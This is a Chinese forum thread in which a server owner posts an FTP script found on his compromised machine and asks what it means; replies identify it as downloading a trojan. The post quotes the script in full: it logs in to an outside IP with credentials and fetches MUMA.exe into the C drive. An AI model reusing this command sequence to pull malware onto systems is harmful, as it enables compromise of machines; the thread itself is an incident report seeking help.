服务器又被攻击了,大家快来看看这是什么意思?

lidanger 发布于 2017/02/03 09:57
阅读 754
收藏 0

open 218.206.207.7
123123
123123
get MUMA.exe c:\bootMUMA.exe
bye
 

这是ftp指令吧?

 

看任务管理器,system32目录下的ftp.exe也被启动了,其他倒没什么异常进程。

以下是话题补充:

@lidanger:这个是我在自己服务器上看到的ftp脚本,其中的IP不是我的服务器iP (2017/04/19 16:42)
加载中
0
lidanger
lidanger

居然能登录

0
姓名长度最少3
姓名长度最少3

登录看了下,感觉像是script boy的服务器

lidanger
lidanger
script boy 是什么?
0
d
dragengt

在你服务器上下载了个木马程序,目测是boot时的注入程序。

lidanger
lidanger
这个怎么查?
返回顶部
顶部